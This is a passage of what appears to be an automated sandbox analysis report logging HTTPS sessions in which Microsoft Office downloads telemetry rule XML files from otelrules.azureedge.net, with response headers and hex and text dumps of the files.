                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:36 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        91192.168.2.54980013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d3f1dd38-201e-0096-6e47-35ace6000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142537Z-1749fc9bdbd9f5rdhC1DFWbers00000002ng00000000fufk
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        92192.168.2.54980113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142537Z-16547b76f7fkcrm9hC1DFWxdag0000000kw000000000bvyh
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        93192.168.2.54980313.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142537Z-16547b76f7f7lhvnhC1DFWa2k00000000ks0000000002esx
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        94192.168.2.54980213.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6b9ee1ab-f01e-0071-4fa1-34431c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142537Z-1749fc9bdbdjznvchC1DFWx4dc00000002eg00000000es78
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        95192.168.2.54980413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:37 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 21399fcf-c01e-008e-25a8-347381000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142537Z-r178fb8d765z89v7hC1DFW0kvw00000002mg00000000181a
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:37 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        96192.168.2.54980513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-16547b76f7frbg6bhC1DFWr5400000000kn000000000gs21
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        97192.168.2.54980713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-16547b76f7f7lhvnhC1DFWa2k00000000kr0000000006e08
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        98192.168.2.54980613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:38 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 9636621b-f01e-0003-2da1-344453000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142538Z-1749fc9bdbdgs9sshC1DFWt6ws00000002q000000000f28y
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
